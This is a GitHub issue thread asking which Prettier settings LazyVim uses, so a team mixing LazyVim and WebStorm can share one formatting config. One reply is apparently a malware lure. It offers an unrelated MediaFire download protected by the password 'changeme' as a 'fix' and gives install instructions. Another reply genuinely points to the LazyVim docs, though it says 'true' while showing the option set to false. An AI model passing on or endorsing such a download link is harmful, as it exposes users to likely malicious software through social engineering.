### ISSUE TITLE
Cannot Find LazyVims Prettier Config

### ISSUE THREAD

**Issue by escapingSamsara** [LazyVim/starter#84]
Hello! I'm currently facing the issue where i use Lazyvim (with prettier installed via LazyExtras) as my IDE and all of my collegues dont, they use IntelliJ/Webstorm. On my last PR we had some major issues because the formatting of my coworkers webstorm was completely different than my formatting via Lazyvim. The PR showed him ALL files changed, because my lazyvim reformatted everything and this makes it impossible for my coworker to find changes (which where like 5 lines of code, not the whole project). So now i want to find the settings/config lazyvim uses for prettier, to attach a prettierrc file into the project so that from now on we can use the formatting i use and also when he changes the project and commits, his IDE formats via my config (LazyVims config). 

Does LazyVim use the default out-of-the-box config of prettier? Is it enough just installing prettier on webstorm and enabling it, installing the package in the project and we are good. 

I hope someone can help me with this. :)

best wishes

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ikerzam** [comment]
Hello @escapingSamsara ,
Here you can find all the info you need [https://www.lazyvim.org/extras/formatting/prettier](Docs), i think if u set this to true it will format with your .prettierrc `vim.g.lazyvim_prettier_needs_config = false`
